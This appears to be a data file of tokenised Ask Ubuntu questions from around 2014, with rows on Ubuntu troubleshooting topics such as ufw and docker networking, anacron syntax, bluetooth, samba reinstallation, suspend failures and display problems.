511336	processes in docker can not connect with ufw enabled	i 'm trying to setup a server to use ufw with docker ( via dokku . ) when ufw is enabled , i can not open connections from one container to another . when it 's disabled , i can connect fine . as an example , i have a container running postgres , and another running my webapp . connections from my webapp to postgres timeout when ufw is enabled . the connection string is : postgres : // < myuser > : < mypass > @ 172.17.42.1:49155/db i 've followed the instructions here and changed the default_forward_policy from drop to accept . i also tried making the changes to sysctl.conf outlined here . this is n't relevant because i 'm not using prax . ufw status : $ sudo ufw status status : active to action from -- -- -- -- -- -- 80/tcp allow anywhere 443/tcp allow anywhere 2375/tcp allow anywhere 80/tcp ( v6 ) allow anywhere ( v6 ) 443/tcp ( v6 ) allow anywhere ( v6 ) 2375/tcp ( v6 ) allow anywhere ( v6 ) docker processes : $ sudo docker ps container id image command created status ports names 76f2bb181584 dokku/mysite : latest /exec bash about an hour ago up about an hour clever_mestorf 0e9c3ec6fff6 dokku/mysite : latest /exec bash 19 hours ago up 19 hours focused_feynman 4cbc630bba25 dokku/mysite : latest /bin/bash -c '/start 19 hours ago up 19 hours 0.0.0.0:49158- > 5000/tcp cranky_lovelace 5072ed4bdc2a redis/mysite : latest /bin/start_redis.sh 19 hours ago up 19 hours 0.0.0.0:49157- > 6379/tcp jovial_galileo 0eab8d9a7fe1 postgresql/mysite : latest /usr/bin/start_pgsql 19 hours ago up 19 hours 0.0.0.0:49155- > 5432/tcp desperate_albattani 2df00a075e89 jezdez/elasticsearch : latest /usr/local/bin/run 19 hours ago up 19 hours 9200/tcp , 9300/tcp angry_carson/elasticsearch , clever_mestorf/elasticsearch , cranky_lovelace/elasticsearch , desperate_hypatia/elasticsearch , elasticsearch_mysite , elegant_shockley/elasticsearch , focused_feynman/elasticsearch , happy_heisenberg/elasticsearch , hungry_franklin/elasticsearch general computer info : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty
511337	tell me where is mistake in anacron task ?	i have tried to make this task for abacron : dm @ dm-system : ~ $ cat /etc/anacrontab # /etc/anacrontab : configuration file for anacron # see anacron ( 8 ) and anacrontab ( 5 ) for details . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin home=/root logname=root # these replace cron 's entries 1 5 cron.daily run-parts -- report /etc/cron.daily 7 10 cron.weekly run-parts -- report /etc/cron.weekly @ monthly 15 cron.monthly run-parts -- report /etc/cron.monthly @ daily 5 /home/dm/devel/btsync & & notify-send `` btsync loaded ( pid `pidof btsync` ) '' `` link < a href='http : //0.0.0.0:8888/gui/ ' > here < /a > . '' this command well done from my xubuntu terminal /home/dm/devel/btsync & & notify-send `` btsync loaded ( pid `pidof btsync` ) '' `` link < a href='http : //0.0.0.0:8888/gui/ ' > here < /a > . '' but when i started my notebook i saw in /var/syslog : aug 14 10:49:06 dm-system anacron [ 904 ] : anacron 2.3 started on 2014-08-14 aug 14 10:49:06 dm-system anacron [ 904 ] : invalid syntax in /etc/anacrontab on line 14 - skipping this line aug 14 10:49:06 dm-system cron [ 841 ] : ( cron ) info ( pidfile fd = 3 ) aug 14 10:49:06 dm-system cron [ 998 ] : ( cron ) startup ( fork ok ) aug 14 10:49:06 dm-system cron [ 998 ] : ( cron ) info ( running @ reboot jobs ) aug 14 10:49:07 dm-system anacron [ 904 ] : will run job `cron.daily ' in 5 min . aug 14 10:49:07 dm-system anacron [ 904 ] : jobs will be executed sequentially aug 14 10:54:04 dm-system anacron [ 904 ] : job `cron.daily ' started aug 14 10:54:05 dm-system anacron [ 2616 ] : invalid syntax in /etc/anacrontab on line 14 - skipping this line aug 14 10:54:05 dm-system anacron [ 2616 ] : updated timestamp for job `cron.daily ' to 2014-08-14
511339	how do i send a notification into blue-envelope area from bash ?	i want to send a notification that would be permanently visible , e.g . so i wo n't miss it . ideally this would be a macos-like popping gui icon in dock , but as i understand , such a notification in ubuntu is provided via blue envelope . so , how do i send notification from command-line there ? python-script would be ok also . thanks !
511342	ip address problem on 2nd network card	i have a network at home with multiple clients , both wired and wifi . all but one of the clients connect to the network with an ip address that is within the range that the router assigns to them . the client not connecting as expected is running 14.04 lts and have two network cards . the onboard network card is only 100 mbps , so i would like to connect it to the periferal network card with 1000 mbps speed . oddly enough , that wired connection gives me an ip address of 90.226 ... something and not 192.168 ... that the all the other clients get assigned ( including the troublesome client , when on the onboard network card ) . i still get internet access on the client , but no access to the rest of the network . how could i get the network card to use a proper network ip address ? thanks , tomas
511343	ubuntu/studio 14.04 brother printer error	in ubuntu 14.04 as well as in studio , i 'm not able to install my printer anymore . i have a brother 2250 dn and the normal installation process is crashing . how should i install the given drivers from the brother site , once the lib and cups from the software center/synaptics would n't work ?
511345	desktop and nautilus fonts suddenly huge	i am running 14.04 ( x64 ) with an nvidia card . about a week ago , the desktop and nautilus fonts both ballooned in size , and i have been unable to find compiz or unity settings that address this . anybody know what might have caused this or what i might try to reign those font sizes down to useful scale ? it is worth noting that the icons also scaled up in keeping with the fonts . i can resize the icons in nautilus , but the fonts remain crazy huge .
511346	how does dpkg install a package ?	the dpkg manual states : this manual is intended for users wishing to understand dpkg 's command line options and package states in more detail than that provided by dpkg -- help . it should not be used by package maintainers wishing to understand how dpkg will install their packages . the descriptions of what dpkg does when installing and removing packages are particularly inadequate . so where do i find the information on `` how dpkg will install my packages '' ?
511349	bluetooth not working but wireless does - ubuntu 14.04 - broadcom	my bluetooth does not work , but wireless works fine . rfkill shows only wireless . below are the results of some diagnostics i ran : $ lspci 00:00.0 host bridge : intel corporation mobile 915gm/pm/gms/910gml express processor to dram controller ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev d3 ) 00:1e.2 multimedia audio controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 audio controller ( rev 03 ) 00:1e.3 modem : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 modem controller ( rev 03 ) 00:1f.0 isa bridge : intel corporation 82801fbm ( ich6m ) lpc interface bridge ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ide controller ( rev 03 ) 02:04.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) 02:06.0 cardbus bridge : texas instruments pcixx21/x515 cardbus controller 02:06.2 firewire ( ieee 1394 ) : texas instruments ohci compliant ieee 1394 host controller 02:0e.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) $ $ $ dmesg | grep -i bluetooth [ 16.582191 ] bluetooth : core ver 2.17 [ 16.582322 ] bluetooth : hci device and connection manager initialized [ 16.582338 ] bluetooth : hci socket layer initialized [ 16.582343 ] bluetooth : l2cap socket layer initialized [ 16.582349 ] bluetooth : sco socket layer initialized [ 16.639065 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 16.639072 ] bluetooth : bnep filters : protocol multicast [ 16.639088 ] bluetooth : bnep socket layer initialized [ 16.695956 ] bluetooth : rfcomm tty layer initialized [ 16.695977 ] bluetooth : rfcomm socket layer initialized [ 16.695985 ] bluetooth : rfcomm ver 1.11 $ sudo hcitool dev devices : $ sudo hcitool $ sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no $ sudo lshw | grep -i blue $ sudo lsusb | grep -i blue anyone facing this issue ? any ideas to resolve it ? thanks in advance .
511355	ca n't fetch the latest ubuntu upgrade on ubuntu 11.04	i just started up an old laptop with an old version of ubuntu ( 11.04 ) . it wo n't let me download applications ( it throws some untrusted sources error ) , so i 'm trying to update to a new version . in system > administration i have discovered application called update manager . i have clicked upgrade , but this crap has popped out : i have no network problems . the only explanation is that the ubuntu update servers have changed their address while this computer was offline . how can i troubleshoot this problem and proceed the upgrade ?
511356	my server freezes after update apache2 server	i have a ubuntu server 12.04 with lamp and ubuntu desktop enviroment . i updated the server and after a reboot it froze and now i ca n't even access the tty 's 1 ... 6 . before the update , the server was hosting my webpage . how can i restore my server without loosing all the info ?
511359	where are the programs in ubuntu	i am new to ubuntu and linux world . where can i see the list of all programs installed in ubuntu ? ex : if i want to launch `` terminal '' . i need to click the upper left icon and type `` terminal '' . where is the icon really located ? i would like to take a look in the programs installed . are they separeted by category ? i do n't know . thanks
511362	determine aps wireless regulatory domain	the problem that i have observed intermittently as kernel patches come through , is that my wifi does not always obtain the regulatory domain from the ap . the symptom is poor connectivity with frequent drops , and the work-aroud has been to issue the command sudo iw reg set us , which i usually place in /etc/rc.local as iw reg set us so the question is : does anyone know how to query the ap ( a linksys wrt610n ) to ask what regulatory domain it is set to ? an excerpt from /var/log/dmesg from my last boot follows , after changing /etc/default/crda as recommended in comments below : if i am reading this correctly , the regulatory domain is initialized to world , and then using the information in /etc/default/crda , the regulatory domain is updated to become us . [ 12.109314 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debug disabled [ 12.109317 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debugfs enabled [ 12.109318 ] iwlwifi 0000:02:00.0 : config_iwlwifi_device_tracing enabled [ 12.109320 ] iwlwifi 0000:02:00.0 : detected intel ( r ) centrino ( r ) wireless-n 2230 bgn , rev=0xc8 [ 12.109419 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s [ 12.124492 ] intel_rapl : domain uncore energy ctr 380974:380974 not working , skip [ 12.183857 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 12.394864 ] cfg80211 : world regulatory domain updated : [ 12.394867 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 12.394868 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.394869 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.394870 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.394871 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.394872 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.522154 ] cfg80211 : calling crda for country : us [ 12.523937 ] cfg80211 : regulatory domain changed to country : us [ 12.523939 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 12.523941 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 12.523942 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 12.523943 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.523943 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.523944 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12.523945 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 12.523946 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm )
511363	how to port html5 sdk app to .deb or any other executable extension	i completed my ubuntu html5 app on ubuntu sdk ( the title says `` qt creator '' ) . now how can i export it as ubuntu executable ?
511368	ubuntu gnome 14.04 : unified panel sliders	i 've installed ubuntu 14.04 with gnome ( version 3.10 ) and i seem to be missing certain items in the unified panel like the brightness slider , wired connection status , bluetooth status and battery status when charged . there is only a volume slider , wifi status and the username . is anyone else having this problem or is it a problem with my configuration ? i 've read somewhere that this has something to do with gnome-settings-daemon being version 3.8 . if this is the problem is there anything i can do or do i wait till 14.10 ?
511369	install windows or newer ubuntu from old live cd	i have an ubuntu 10.10 cd lying around and i want to install either ubuntu 14.04 or windows 7 . unfortunately i have no usb at the moment . is this possible without having to go through 7 painful upgrade processes to get to 14.04 ?
511370	`` applications can no longer access your online account ''	as soon as i start my computer this message appears : applications can no longer access your ... @ gmail.com online account choose online accounts from the user menu to reinstate access to this account . so i open online accounts , enter the password and it gets connected . but when i restart the computer , the same message comes up . i have repeated the process three times but no use .
511374	fstrim does not work for ext4 as root	i have a sandisk ssd p4 32gb and i use ext4 . ubuntu 14.04 . i read that i should execute the trim command from time to time , however , this command does n't work on my machine : # language=en_us : en fstrim / fstrim : / : fitrim ioctl failed : operation not supported i already have discard mount option , but my other computer with opensuse took 30 minutes when asked to fstrim for the first time , suggesting discard option did not function since installation 6 months ago . i intend to trim my ubuntu machine too to see whether discard worked . i googled for 30 minutes . all `` answers '' either say you should upgrade to ext4 or you should use root and op says `` oh it then works thanks. '' . i already did both .
511376	boot back to windows ( or anything ) not duplicate	i need help to : 1.fix the cd drive ( in the bios ) or 2 . boot windows/linux iso from grub2 or 3 . install plop boot manager to grub 2/pc clear simple instructions would be appreciated as i have n't got the hang of linux yet this is not a duplicate as if you read the question you will see that i ca n't boot from a cd as it does not and the pc does n't support usb
511377	install button absent in software update center	the install button does not appear for any of the apps in the software update center . how can i fix this ?
511378	2560 x 1080 screen resolution on ubuntu 14.04	i recently installed ubuntu 14.04 on a mac mini and bought a 2560 x 1080 ultrawide lg monitor for it . problem is that it does n't display the proper resolution , the maximum being 1920 x 1080 under ubuntu settings . any suggestions on what i should do ? please give clear instructions as am not an ubuntu expert .
511381	no applications in dash , including terminal after upgrade 12.04 to 14.04	newbie running 14.04 , heavily reliant on dash and unity atm whilst learning commands . an upgrade to 14.04 has had multiple issues . the main issue is that there are no applications in dash and i have no idea how to launch them without dash . on boot , a long list of white text flashes past , with `` failed '' featuring prominently . to make things worse ctrl alt fn & alt fn does nothing ( except adjust screen brightness ) i 've tried these : unity -- reset result : error : the reset option is now deprecated then tried unity -- reset-icons result : still no apps there were numerous issues during the upgrade and tons of error messages . so my final fix is to either reinstall 14.04 or reinstall 12.04 ... .but in the absence of being able to access applications , i ca n't make a bootable usb . many thanks .
511382	ubuntu 14.04 top taskbar missing	my top taskbar is missing . no shutdown button , language indicator , date and time . i have ubuntu 14.04 . see here what is missing when i 'm logged in with another user
511383	can not chown or chmod using sudo anymore	i was trying to make an adjustment to the /etc/sudoers file , and i accidentally corrupted it . i restored it via the grub and using the ubuntu 14.04 default . but now it seems i can change ownership or permissions when trying to run sudo chown and sudo chmod . i cant even sudo sh . i just get the following error : sudo : chown : command not found is there anything that i might have lost in the sudoers file that was allowing me to run these commands ? this is my output of $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games this is the output from : whereis sudo chown sudo : /usr/bin/sudo /usr/lib/sudo /usr/bin/x11/sudo /usr/share/man/man8/sudo.8.gz chown : /bin/chown /usr/share/man/man2/chown.2.gz /usr/share/man/man1/chown.1.gz also.. this is where i got the generic ubuntu 14.04 sudoers file from . http : //heggel4.wordpress.com/2012/10/25/repair-sudoers-file-on-ubuntu-12-04-lts/ please help . i 'm in over my head : / thanks all : )
511384	how to install ubuntu touch on a samsung s4 clone	i was wondering if it is possible to install ubuntu touch on a mobile device deciding on one which mimics ( even in the operating system which is android 4.2 ) a samsung s4 . to be precise , beyond that i can not get into download mode because if i press the usual key combination ( being not the original ) it opens a menu in japanese or chinese that i obviously do not understand ! so is it necessary to get into download mode ? if so , can it be done by connecting the computer with usb or windows to ubuntu ? if it can be installed , is an installation guide available ? thanks in advance to everyone !
511385	no sound on any web browser	i was using my laptop to play youtube on my tv . i had no problems . it was going through my hdmi and i was using the cable to play sound through the tv . i disconnected the cable and since then there is no sound . the sound card is working because i get the welcome tone when i get my password screen . i have tried to use firefox and chrome and nothing . i have restarted and rebooted and nothing . i have checked my sound settings and they are all ok. ubuntu version 14.04 lts . latest versions of firefox and chrome . if you need any other info please ask . update - not working on vlc media player either ...
511387	nut not shutting down ups . does 14.04 server block usb comms in runlevel 0 ?	i recently installed network ups tools ( nut ) on my new ubuntu 14.04 64-bit server . i used the exact same conf files that i had on my old ubuntu 12.04 32-bit server . everything went well except that when i tested the 14.04 server for automatic shutdowns by giving the command sudo upsmon -c fsd the ups did not turn off the load when the system was brought down by nut and therefore , the server never restarted . it turns out that the nut version on my 14.04 server has different ( newer ) init scripts than the one on the 12.04 server . so i thought , maybe there is a bug on these newer scrips . to try and figure out what was happening , i disconnected the server from the ups power outlet and connected it directly to the utility power outlet , but left the usb connection on and booted it up . i then sent the following command from the terminal console : sudo /sbin/upsdrvctl shutdown the ups turned off the load , and a little while later , turned it on again as it should . next , i temporarily modified the /etc/init.d/halt script by replacing this section of code : # see if we need to cut the power . if [ `` $ init_halt '' = `` poweroff '' ] & & [ -x /etc/init.d/ups-monitor ] then /etc/init.d/ups-monitor poweroff fi with this : /sbin/upsdrvctl shutdown the original code calls `` ups-monitor '' which is a link to script `` nut-client '' which , after doing some checks , calls script `` nut-server '' which in turn issues the command `` /sbin/upsdrvctl shutdown '' to shutdown the ups load . so now , with this temporary mod , the nut scripts where out of the way . however when i gave the command sudo upsmon -c fsd the system went down but once again the ups did not turn off the load . could it be that the ubuntu server 14.04 is blocking usb communications on runlevel 0 when the halt script is running ? ? ?
511389	making windows seasoned students feel comfortable with kubuntu	after two years of endless campaigning by me and my schoolmate and comrade , ask ubuntu user shubham rao , we have finally succeeded in convincing our teachers to switch from windows xp to linux . a massive virus attack has infested all of our computer lab pcs and the mid-session hassle of formatting and losing data made them balk at the idea of reformatting the pcs halfway through the session-and we suggested they try kubuntu to be comfortable while enjoying the safety and open nature of linux . they were thoroughly impressed by the visuals of the kde plasma desktop , and how the microsoft programs needed by the syllabi ( office 2007 , visual studio 6 etc . ) were running natively in wine . so this is what we agreed to-we will occupy one pc , put kubuntu on it , customize it continuously to make it windows-friendly and then clone the entire lab 's hdds . but we are running into some hurdles which are affecting the comfort of the students-we asked few of my classmates to give kubuntu a shot , and though they found it much better than windows , they were confused by some minor things . they have n't used linux-or any computer operating system save windows , they lack a bit of intuition , and they found it difficult to hunt for their windows counterpart programs on kubuntu-kate/notepad , konsole/command prompt , paint/libreoffice draw-specially using the search bar . we wish to eliminate these minor things completely before the entire lab makes the switch to kubuntu : disk labels , disk labels , disk labels : we want a drive to be seen as local disk c : , local disk d : , and not 78.9 gib volume , as dolphin shows it . however , it seems there is no way how to change the labels . adding custom tags to applications listed in kickoff : say , if someone searches for notepad in the search bar , kate should come up . or konsole when we type `` command prompt '' . they do n't know the names of the kde/linux counterparts at all . custom sections in kickoff : much needed , since guys do n't have the patience to look for all of the microsoft office and libreoffice programs combined into one `` office '' section by the os automatically . change program labels ? why not ? of course , this is heartburn , but they wo n't give two hoots to whether i call a program media player or amarok . we would like your advice please , on these and other issues that might come to your mind when thinking how to make windows-seasoned folks comfy on kubuntu-and make them stay on to the magic of open source-and linux . ps : this does sound pretty stupid but please do n't ask us to try xfce or lxde . kde plasma is way too awesome to be abandoned . ; )
511390	internet working very slow in ubuntu 12.04	the wifi on my laptop is working very slow . pictures are n't loading on most of the websites etc..all in all most of the websites are loading just half . i am using sonyf15218 . if you need any other configurations or details please let me know . can someone please guide me through this..it 's extremely frustrating .
511391	how to get spotify running in winetricks	i am trying to get spotify running in winetricks . it says it installed then opened a internet explorer window and that is as far as i can get . any suggestions ?
511394	win8 + ubuntu 12.04 : grub loader menu is not shown any more	i am sorry if this is a duplicate . several months ago i managed to get ubuntu 12.04 working on my laptop together with preinstalled windows 8 . it was quite a complicated procedure and this forum helped me a lot . the case is that i have not used ubuntu for several months and now i realized that i do not see the grub menu any more after reboot ! i remember that i turned fast boot on after installing ubuntu , but now it is off . is something corrupted now ?
511397	moving applications from unity launcher to docky	i have just installed docky with mac style and i really like it ! but it seems that there is no way to drag and drop existing application icons from unity launcher to the docky . foe example i want to add the workspace switcher to docky ... how can i do this ?
511398	ubuntu 14.04 the package lists or status file could not be parsed or opened	i have a problem with the software updater , the synaptic package manager and the ubuntu software center . when i use the terminal to update , i receive the following error : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_trusty-security_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened . ubuntu 14.04
511400	unable to eject quofi	i 've tried to make a bootable usb stick after which i had the problem of subsequently not being able to eject safely my usb stick . this is the error message : error unmounting /dev/sdb1 : command-line `umount `` /media/josh/quofi '' ' exited with non-zero exit status 1 : umount : /media/josh/quofi : not found
511402	how to set up a ram-disk	i need a ram-disk to move data between two applications and have been using google to learn about it . i have found articles that talk about tempfs and /dev/shm . apparently /dev/shm points to /run/shm . i noticed that there is a folder /run/user and instructions to modify fstab and grub.conf . how do i set up the ram-disk ( is /run/user a ram-disk ? ) ? i think i will need about 10 mb and i really want to avoid using swap .
511403	i messed up my samba and having problems reinstalling	i upgraded my ubuntu from 13.04 to 14.04 and was having problems with sharing files over my windows network . in my wisdom i removed the samba and samba client sudo apt-get remove -- purge samba sudo apt-get remove -- purge smbclient libsmbclient and also deleted the folder /etc/samba/ and tried to do a fresh re-install with sudo apt-get install samba sudo apt-get install smbclient libsmbclient but now it wo n't recreate the /etc/samba/ with the config files . i did a search for samba in my file directory and there are numerous files but not the config files . how can i clean up my system and do a fresh reinstall of samba ?
511406	i am not able to uninstall an application that did not install correctly at the start itself , which was a third party software	my name is davidson . i had tried to install a third-party software to make my modem work . the modem was tata photon+ which came with its own drivers . the software did not install well nor would it uninstall . on looking up the internet about the probable solutions , i found some suggestions which as can be seen below did not work . please suggest a problem a solution to this ; else , i would have to format my partition which is not a proper thing , is n't it ? thanks . the interaction between the system and me is as follows : elohim @ elohim-dell-inspiron-n4110 : ~ $ sudo apt-get autoclean [ sudo ] password for elohim : reading package lists ... done building dependency tree reading state information ... done elohim @ elohim-dell-inspiron-n4110 : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : crossplatformui : i386 0 upgraded , 0 newly installed , 1 to remove and 156 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 189993 files and directories currently installed . ) removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) elohim @ elohim-dell-inspiron-n4110 : ~ $
511408	issue moving a file and error when unzip ( solved )	not sure if this is as weird as i see it but anyway i 'm installing kippo-graph `` data visualization tool '' on ubuntu server 14.04 lts but after i download the file which is ( kippo.tar.gz ) and i move it to other directory it appears as a hidden file ... then when i run this command to unzip the file tar zxvf kippo-graph-1.2.tar.gz i get this error message tar ( child ) : kippo-graph-1.2.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now how can i solve the problem and proceed with the unzipping process
511409	what are the old-release alternatives for http : //archive.canonical.com/ubuntu ?	i 'm trying to upgrade my system from ubuntu 11.04 to the latest supported version . as usually when dealing with linux , i 'm having a lot of fun . i have found a answer that suggests to re-map the software sources to a different location . after re-maping , some entries remained unchanged and are now causing problems : # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu maverick partner deb-src http : //archive.canonical.com/ubuntu maverick partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main i need to re-map them too . this is what i see when upgrading before the upgrade fails : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages.gz 404 not found , e : some index files failed to download , they have been ignored , or old ones used instead . so where is old-release version of this server ?
511413	suspend broken : pm-suspend fails due to /sys/power/* being a read-only file system	my system 76 laptop running 14.04 wo n't suspend . running sudo pm-suspend fails with the following in /var/log/pm-suspend.log : running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq : 23 : /usr/lib/pm-utils/sleep.d/94cpufreq : can not create cpu0/cpufreq/scaling_governor : read-only file system ... /usr/lib/pm-utils/sleep.d/94cpufreq : 23 : /usr/lib/pm-utils/sleep.d/94cpufreq : can not create cpu7/cpufreq/scaling_governor : read-only file system /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : returned exit code 2.` if i disable all sleep.d scripts that attempt to write to /sys , it still ends up failing : /usr/sbin/pm-suspend : 321 : /usr/sbin/pm-suspend : can not create /sys/power/state : read-only file system sysfs looks perfectly normal to me : sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) # ls -al /sys/power total 0 drwxr-xr-x 2 root root 0 aug 14 10:25 . dr-xr-xr-x 13 root root 0 aug 14 09:47 .. -rw-r -- r -- 1 root root 4096 aug 14 10:45 disk -rw-r -- r -- 1 root root 4096 aug 14 11:05 image_size -rw-r -- r -- 1 root root 4096 aug 14 11:05 pm_async -rw-r -- r -- 1 root root 4096 aug 14 11:05 pm_freeze_timeout -rw-r -- r -- 1 root root 4096 aug 14 11:05 pm_print_times -rw-r -- r -- 1 root root 4096 aug 14 11:05 pm_test -rw-r -- r -- 1 root root 4096 aug 14 11:05 pm_trace -rw-r -- r -- 1 root root 4096 aug 14 11:05 pm_trace_dev_match -rw-r -- r -- 1 root root 4096 aug 14 11:05 reserved_size -rw-r -- r -- 1 root root 4096 aug 14 11:05 resume -rw-r -- r -- 1 root root 4096 aug 14 10:25 state -rw-r -- r -- 1 root root 4096 aug 14 11:05 wakeup_count i always use sudo or su to root when trying the command . even trying to manually use the kernel 's test power management interface fails : root @ ... : ~ # echo core > /sys/power/pm_test -su : /sys/power/pm_test : read-only file system kernel : 3.13.0-33-generic # 58-ubuntu all packages are up to date .
511416	install plop boot manger to boot to usb	i need help instating plop boot manager onto my pc that is running ubuntu 14.04 and grub 2 and i ca n't boot from a cd as the bios is no longer recognizing the cd drive and the pc does n't support usb booting natively . clear simple instructions would be appreciated as i have n't got the hang of linux yet
511417	upgraded to 14.04 from 12.04 , getting âthe system is running in low-graphics modeâ error , have checked 'community '	i did see the community question , running in low graphics mode i checked the greeter , reinstalled ubuntu-desktop , reinstalled fglrx , installed gdm , but so far i 'm still getting the same screen . i checked the logs , it said there was a segmentation fault at 0x8 as the last message before it turned off the x server . any idea how to get my graphics to run on 14.04 ?
511421	ssh and keyring utility	i have an ssh account at a certain host , and i plan to access it very frequently . recently i added this `` key '' to what looks like an ssh keyring . how do i make ssh log in automatically to a certain host/user combination using this key ?
511422	how do i run a windows exe on ubuntu natively ?	i 'm making an exe file that i want to be able to have run on both linux and windows , but i do n't want the exe to have to run in grub . i need it to be an exe as i need it to have basically the same codebase as the windows version as that is what a friend is helping to develop . i want to know how i could create some script or something that would allow running an exe file in ubuntu without the separation of wine . this is a program to help encrypt programs and such and uses some build in windows based programs that it runs api triggers on so i need it to be able to interact with the filesystem directly as root . any ideas on how i would do this ? just to recap i do n't just want to be able to run a windows program in an emulator , i want to be able to run them natively with direct access to the filesystem .
511424	deletion of .private	ubuntu 14.04 i was running out of space on my computers hard drive . upon inspection it was almost all being used by the .private folder . i couldnât figure out what any of the files were , so i deleted it . all of my files are gone . is there anyway i can get them back ? thanks for your time and consideration .
511428	addressing in ubuntu for webserver/site	i am having an '500 internal error ' on my webserver . i call for a file that is located at '/usr/lib/cgi-bin/pagload.py ' but the call for it in the 'index.html ' was only 'cgi-bin/pageload.py ' . i attempted to change it to '/usr/lib/cgi-bin/pagload.py ' and other variations but it never worked and i got a 404 error . what is the proper addressing on ubuntu 12.04 ? any tips on this problem ? here is the error from chrome debugger . post http : //169.254.10.2/cgi-bin/pageload.py 500 ( internal server error ) jquery-1.9.1.js:8526 send jquery-1.9.1.js:8526 jquery.extend.ajax jquery-1.9.1.js:7978 ( anonymous function ) ( index ) :966 fire jquery-1.9.1.js:1037 self.firewith jquery-1.9.1.js:1148 jquery.extend.ready jquery-1.9.1.js:433 completed jquery-1.9.1.js:103
511429	sound settings missing	when i click on the sound icon then sound settings systems settings opens and there is no sound setting menu . in fact the only icons in the system settings window , there are 4 icons : language support , security and privacy , landscape service and software and updates . what happened to all of the other settings icons ? ubuntu 14.04 64 bit gb
511431	display problam	after installing desktop 14.04.1 on an old emachines el1300g-02w with a geoforce 6150ose video . the desktop boots up and immediately afterwards the screen becomes distorted like a horizontal hold problem on old tvs . i have tried this with two different monitors with the same result . all through the install process ( 3 times ) the picture is fine . any suggestions would be appreciated .
